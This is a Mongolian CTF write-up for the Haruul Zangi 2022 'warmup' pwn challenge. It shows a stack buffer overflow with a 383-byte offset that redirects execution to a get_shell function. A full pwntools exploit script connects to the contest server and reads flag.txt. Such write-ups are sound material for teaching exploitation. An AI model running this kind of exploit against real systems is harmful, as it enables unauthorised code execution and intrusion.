Haruul Zangi writeup: pwn - warmup

“Харуул занги 2022” тэмцээний финалын шатанд орж ирсэн pwn төрлийн “warmup” даалгаврын writeup-ыг хүргэж байна.

File: warmup: ELF 64-bit LSB executable, x86-64

Exploit protection шалгаж үзвэл
image
NX bit enabled буюу shellcode шууд stack эсвэл global var дээрээс ажиллуулах боломжгүй харин stack canary идэвхгүй буюу buffer overflow хийх боломжтой байна. (Гараас утга авахдаа read function ашигласан байсан)

Instruction Pointer удирдах offset:
image

Энэ даалгаврын хувьд get_shell гэсэн функц руу redirect хийхэд хангалттай байсан
image

payload = padding + base +

Final exploit:

#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# This exploit template was generated via:
# $ pwn template ./warmup --host 139.162.18.38 --port 23334
from pwn import *

# Set up pwntools for the correct architecture
exe = context.binary = ELF('./warmup')

# Many built-in settings can be controlled on the command-line and show up
# in "args".  For example, to dump all data sent/received, and disable ASLR
# for all created processes...
# ./exploit.py DEBUG NOASLR
# ./exploit.py GDB HOST=example.com PORT=4141
host = args.HOST or '139.162.18.38'
port = int(args.PORT or 23334)

def start_local(argv=[], *a, **kw):
    '''Execute the target binary locally'''
    if args.GDB:
        return gdb.debug([exe.path] + argv, gdbscript=gdbscript, *a, **kw)
    else:
        return process([exe.path] + argv, *a, **kw)

def start_remote(argv=[], *a, **kw):
    '''Connect to the process on the remote host'''
    io = connect(host, port)
    if args.GDB:
        gdb.attach(io, gdbscript=gdbscript)
    return io

def start(argv=[], *a, **kw):
    '''Start the exploit against the target.'''
    if args.LOCAL:
        return start_local(argv, *a, **kw)
    else:
        return start_remote(argv, *a, **kw)

# Specify your GDB script here for debugging
# GDB will be launched if the exploit is run via e.g.
# ./exploit.py GDB
gdbscript = '''
tbreak main
continue
'''.format(**locals())

#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================
# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)

io = start()

# shellcode = asm(shellcraft.sh())
# payload = fit({
#     32: 0xdeadbeef,
#     'iaaa': [1, 2, 'Hello', 3]
# }, length=128)
# io.send(payload)
# flag = io.recv(...)
# log.success(flag)

offset = 383
get_shell = 0x0000000000401182

payload = flat({
  offset: get_shell
})

io.sendlineafter(b'Welcome to echo service.', payload)

io.recvuntil(b"End?[Y/N]")
io.sendline(b"Y")
io.recvuntil(b"[Y/N] ")
io.sendline(b"cat flag.txt")
flag = io.recv()
success(flag.decode())

image

Me: bilguunz (Bilguun) · GitHub

4 Likes